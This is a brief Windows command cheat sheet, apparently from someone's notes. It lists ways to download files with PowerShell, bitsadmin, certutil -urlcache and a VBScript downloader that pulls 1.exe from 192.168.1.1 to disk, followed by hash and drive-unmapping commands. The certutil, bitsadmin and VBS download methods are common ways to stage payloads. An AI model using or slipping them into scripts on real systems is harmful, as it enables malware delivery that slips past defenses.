# Windows
下载
PowerShell
PS> $url = "https://go.microsoft.com/fwlink/?linkid=2108834&Channel=Stable&language=zh-cn"
PS> $filePath = "$env:userprofile\Downloads\MicrosoftEdgeSetup.exe"
PS> Invoke-WebRequest -Uri $url -OutFile $filePath
PS> & "$env:userprofile\Downloads\MicrosoftEdgeSetup.exe"
CMD
bitsadmin /transfer heihahou /priority high URL D:\chrome.exe
bitsadmin /transfer n URL D:\chrome.exe
certutil.exe -urlcache -split -f URL 浏览器.exe
VBS
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\1.exe",2
Hash
certutil -hashfile yourfilename.ext MD5
certutil -hashfile yourfilename.ext SHA1
certutil -hashfile yourfilename.ext SHA256
磁盘
net use z: /delete